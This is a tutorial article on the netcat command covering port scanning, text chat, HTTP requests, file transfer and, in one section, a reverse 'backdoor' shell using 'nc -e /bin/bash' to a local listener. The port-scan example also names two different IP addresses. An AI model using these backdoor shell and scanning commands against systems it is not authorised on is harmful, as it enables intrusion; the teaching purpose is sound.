Netcat (nc) Command With Examples
Netcat or nc is a legacy command line tool that enables port scanning and port listening. It is used in various fields of IT, even by programmers and hacker.
In addition, you may really transfer files directly over Netcat or use it as a backdoor into other computer networks. There are new powerful tools which can be used for specific use cases.
In this article, we will discuss the different task you may perform with the help of netcat.
Netcat should not be confused with other similar tool called, ncat by nmap.org.
How to install NetCat (nc)?
You can try to install with default package manager in your Linux distribution. Try with netcat or nc as package name.
If it's not in the default repository of your system. You can download and install netcat manually from this link or official GNU rewrite.
Basic Netcat Commands
Once you have Netcat on your system, you can start by playing with simple commands to evaluate its operation.
nc -h – This will provide the help menu or list of all the possible options/flags you may use in Netcat.
nc -l port_number – This will start listening for TCP connections and UDP events on a given port number.
nc site.com port_number < filename – This will transfer a file to a host/IP on the specified port number.
Let's explore more advanced options and use cases in netcat.
Example use cases of Netcat tool
We will dive deep into some use cases of Netcat.
1. Port Scanning with Netcat
A port scan with netcat will verify the status of all ports on the supplied domain or IP address.
This lets you detect whether a firewall or other blocking device is in place, which is helpful while troubleshooting and fixing a network issue.
A simple port scan command for an IP address using netcat looks like this:
nc -v -z 22.214.171.124 1-1000
This command can be understood in below segments:
-v outputs more information to help debugging.
-z stands for scanning mode.
126.96.36.199 is the host that we are performing port scan on.
1-1000 is the range of ports to scan.
If you don’t know the IP address of a server or website, you can use domain name or get the IP using ping command.
2. Create a Chat or Web Server
The fact is that many IT specialists and system administrators would prefer a basic text-chat solution instead of bulky and slow GUI apps.
First, start listening on a port number using netcat. Do not to pick a port that is already in use by another application or service.
nc -l -p 1299
On the other system, all you need to do is begin the chat session with a fresh TCP connection:
nc 127.0.0.1 1299
Make sure you specify a reachable host and port which is set to listening by netcat.
3. HTTP Requests with Netcat
Netcat can serve as a web browser to make HTTP requests. Here’s an example of how to extract the HTML content from Google’s homepage:
printf “GET / HTTP/1.0\r\n\r\n” | nc google.com 80
Note that the port number 80 (HTTP) is necessary for this sort of command, as the World Wide Web uses it as a default.
4. Launch Reverse (Backdoor) Shell with Netcat
A reverse shell is a remote access shell strategy where you execute administrative commands from one terminal while connecting to another server on the network or internet.
To get started, first, you need to activate the shell tool over a Netcat command by utilizing Netcat reverse shell:
nc -lvnp 5555
Then from any other machine on the network, run:
nc -e /bin/bash 127.0.0.1 5555
This will, simply, allow you to run commands to other system with netcat.
Let's discuss some questions you might have related to netcat commands.
Q: How to Prevent DNS Lookup in Netcat?
Netcat commands execute quickest when they are functioning exclusively on IP addresses. This because no time is spent communicating to domain name servers (DNS) to convert server names into IP addresses.
You can use the “
-n” operator so that the program understands that DNS lookups are not necessary. It only works with IP addresses.
Q: Can Netcat be used in Shell Scripting?
Netcat can be used as part of a bigger script that performs an automated operation. You could create a script that:
- Import a text file with server names or IP addresses.
- Call Netcat to do a port scan on each server.
- Write the result to a new text file for analysis.
Q: Is netcat secure?
Netcat itself does not provide any type of encryption or security features. But, there are some tools provided by community to use netcat with SSL/TLS encryption.
Q: How to receive and save files with Netcat?
Here is an example to help you save Netcat received data to file.
netcat site.com 80 > file
This will save everything it received from host/IP
site.com and port
You can integrate solutions from Varonis (or github) with tools like Netcat to make its communication safer. Happy networking!